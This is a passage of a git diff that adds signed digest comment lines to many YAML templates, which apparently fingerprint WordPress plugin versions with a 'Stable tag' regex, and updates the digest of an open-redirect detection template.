.../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/hostinger.yaml | 1 + http/technologies/wordpress/plugins/image-optimization.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/metform.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/simple-history.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/templately.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + .../technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-seopress.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + http/vulnerabilities/generic/open-redirect-generic.yaml | 2 +- 202 files changed, 202 insertions(+), 2 deletions(-) diff --git a/dast/vulnerabilities/redirect/open-redirect.yaml b/dast/vulnerabilities/redirect/open-redirect.yaml index 50d350f14d..cfe0d180a6 100644 --- a/dast/vulnerabilities/redirect/open-redirect.yaml +++ b/dast/vulnerabilities/redirect/open-redirect.yaml @@ -181,4 +181,4 @@ http: - 301 - 302 - 307 -# digest: 490a004630440220798dab0882b46e287f296c1f1ba1f9b47422c2b080486183184727f3de119087022044b26046d5aba5529bb7583ccebd65748198fff98a625c16b07432abf5a4fe8c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d5d09d72be494c1eb95fd874c9d31cee1ac9e14d7d578419fa0a8298c9f8ca9002202e00bd1843e97bb9160eb898cea0a3301321571d4d65ea7c4bce6b90f9dc82fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 3fd2256749..066e4001bc 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201a0cb2289816c51f7d36609c737196ba9a1de7ca813f2e1c9361b6c34bf4de9f022100ddf473616f26f1f04152d8036ebbf20764f2e91b969c6b3e1f54409dc1abebb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 6a0d344b63..90dc755365 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009528fd2c65974432e6f8ff3697d8719250ac544be7e171cf685615b506b9b69d0221009b9d0ff3a696228306574998d4a26ff3c5368cff1d838c45555adf6f75e10d9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 6fb5080bc8..504e97ec62 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220057ea8832bdc60d651f2654347529120ffd352f18002fcabb2756795fc12eee20220200fade18948114ad83c81847a1057882b4b58f25ac2491bf2588bad2125fdf8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index cddbb4bb2e..721e9eb64e 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022001982ddbab3738ad1af4fd6d3e56375d33cb8e0a20eecba41d6ecc58e9f34999022100fa06ddd8f8181b3d733d09c42483fe69582171845ede52f76443e14e6964e1f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 6f253f9f55..b277969d45 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f2695462fb853c9b01b1fa9c062bc1121bd7d95154f44d8537574f36b96e0b87022100fc9614d4d9b67ae0285cf7b3bb1ae0d90a693221e74c1777c561a2613e5760f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index fe45de4d04..765cb1bf1c 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c6a12b9f233708e392ad44588610edc52d0827438ca0e213e34dc1fd5ddca4f702210082d613b28f2a1db85b1e68df6c70c6163d58e3c992655ad6e3e33ae91e2e0444:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 69e425f446..bd455711b4 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008874122a4bf0f3c5953fd919733113711ee88e4aa73b2922206e2168a99ca005022100d778ab6bbb0d85b2cb9a8f63be94fb04bfa5c68aa2a857d1e645f7c7c630ca9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 9c07c65e4e..e33bd20e13 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220239d566a18761cd95a4238081fe8aa9428ee67b734e8e6a5674432b1c0b4f162022100cb59f217b5dd088af2b2398ca68838c9c4a7fd9d8dc7163502a478b1a82ff70a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 92c8f5656e..321a670128 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210086b860ddcc5181903f1c83a2e9c28bcba6613216e9a85d47c57dff855477be6f022001cab48543e5e972bb7d3c89c2135d6670aada07dcd939ce538a2621ecbcf583:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 70975a19a1..dc52461164 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100856786cfd664461b6f5cf373bd622ae4cd4f2fd25446c276801dc27d13dac1be022100e4559f028ce3ea893fedc8a1c6f909e323d3dfa2032da8a207300ef4e0b391b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index fd7e3e99dd..718e001cdc 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100988dfa0f3147880459aff2eb4db8397ad8c20d780da0b6dded3d49bb3855f8d6022070b8dd9c1c6aabb463ac5d1d55fc85395de93a12a2d9dc97f8b89717b2137c47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 18f2a2ae84..94ed2587b8 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100eea0c35055952c71bca538bb2820c12cfcc5449eca2f21d123e988b28804fdba022100f2db4befa6d71c0518bb22603718e1d283bb5a79449a78fd19d5a5565124864a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 11cb41fb2c..7801b47b2c 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022021e60243d14264e9dba8ea688de5b3474409961c36bceb3ecfc09171bcafd475022100c33014209c734b729eeaaedc749e5e5ea456b8648aaee1b987eb3f8ad83bec59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index df3c5f3a94..de4a3b8ddb 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022038dc6e4638b425b5c25976c6a1ea2bbfebec41f45b353b081972a9314b8fe2a102202d51ccf11bdfb224f3e4caedd48da06c7c85373f3fa0944e5e8b11020a54e677:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6a50e049dc..c56781aac8 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100833b1ffc11abade5c875fce3d07c63d9df43fd821f22d95314ff3d7276191e71022100892462b0364fece5d18dc06cf1bfd3ff5c808c56ad0581a0e134dd3f4a7989c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index e532694167..2480f3a0c0 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022014a7654a0343a4db574d42a785f280296cf6ac3b8e7133be43cab8809ebcaa78022100aebe35821a8eaeddd05714b5badf8de012cf8b882f6e243c736bad9b827af5d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 4c6e616c1d..14b6b44810 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009be4d87621bc01277bdaaadc7a98c3d6f17f072f80f98a6df235908e3a957b2e022043dff2aa121f603f99e8d25ad5038dc3c48dd212374ba02be929e36d2d3dd4ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index a70a58690c..d79ddfaf48 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202e39b2756daa59459c406d092c2c75393051516742ac57f8b488f8c9ff392945022100a452e401c81268b1a0f861b68bbfbe4761ec17e15f5b49dc09baead17ee5c8c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 4e3c68c53a..0d9b1fa0c8 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210088b6b1abdee2eeb78ffbaf5802926921bf60e1eeff3a0551f56876d1d5d6523902203335beb0338c0be9d89d2dfd72bb400e2fe7c2f2c8301753a8501f2a88e26c0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 0cd866179e..7a0487e1b2 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a7578a7d3a717a899ce4f9e68823c4fe2aaaddbd1f34c96af5d0198f6537db10022078beba8ef443b4a45287dcc0fda1a6d4ebab34ca9d94e51c7128a608dcf6bb7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index b1d8479d13..92f9afe25d 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220638358339c4bd7bdb22bb16f4e48bdedb5ebaa09f530f4eef9ba390fc8ab0cf00220446285b50faf2fb5f563b6202b2701f99d86a38f88b499b59861a41c1914a5cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 04e090313f..0bbf526470 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220320b80bf745b19c3e372f9c5729446ce6ba6d179f7d6d7d7704ebbcd9f846604022100fa9f57fa8b46ea6ff9641156123fae1d71ab7934201c4dc7d0f50bbcc639c2d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 57e618924b..1eabc28f82 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220086facc27f54576458d73621d1b49613bac1f7f44f41dd64686719ac0f068a69022038fd3e84b686a03cc9156372c01518580bf5d1b9ed8b98068d0e89144e5c8766:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 571b3b20a3..5517c15527 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220175125395811df3f8fab5a00d2a2ca40390bc8fad3cc441415ebb673eb887776022100d6f98a488d6ed79e29b987c843216f147cb2ae39901a6500b8c5248d4be0cc2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 4d562316b4..a4f7a4644f 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100eb18f314edf4b8bfdd9fb367ef987fee5cf20881c7566c20484a1b6acb526ed9022057aca81b080ddd34025d3c7b8690c7808205a0f87c20e72b7fda1575bc5a61cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index dcea952545..cba3cd185e 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207e29b389eb4881a631ca421177286f3b0ac9b8e4cf21b80093357e36a0a8a9db0221008c06804f5185e8fdb7b40e02891a07e6fb11e43f2f844d4487ca85b6fa8a0997:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 0ae2f18122..ed6c79a1fd 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100958bf73766039f8ad668aead372f2e35e6e48afbd4b687c4d0a44d929112af47022100dabe7f376b59c3a98305052cbdba06aaa9491ff143a77c9f80bac41c2a1227e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 12f549d536..39ae5a327d 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210082a9f28167351c924ddb746f67827480228856ccb5f1bfb83263c1809fafa16c0220077f16f52851cf2db2617fde87d0530b80241743619242b990689651aea9302c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d8ea6a72f1..d6d40bf3c2 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204f664283df35c44b120a73056eaa98b86dc4f2124c5105540fad59d64210572e02201140b396774514c382e105dc00ad3e7be5d493a18ee36a8e0a014c4cfd356ee7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4afaf9dc97..dfc31222b6 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203f0aac20584ec48b1778b28b0362efb1f75c9ebc044e2a8ce9f36b40315c3e02022100feba53a208d9415687de52a7cedf45dc178f9b75703ce2c6d84a61bf15b8789c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 88fea67f93..0089b9f62d 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fba7f95278217ef3891342f77e1552ea7ddde5fb40cef67b66cd6b9f50c2798a02207ff26bcc58aca7769556d99a7c1f4c9acdb05628f3a93dce4f314073f420a239:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index d205cdbf36..1d191afa7a 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206ab50fcbc6f603b20bd69f28cb49520f9d0c542b24aff300e6143e3ac4f757e6022028160f9ccfb2e99430ba7769ddcaee074959b2e9e5e9ba931a7c14db541f3643:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 3fa20df7d2..7a05272abc 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 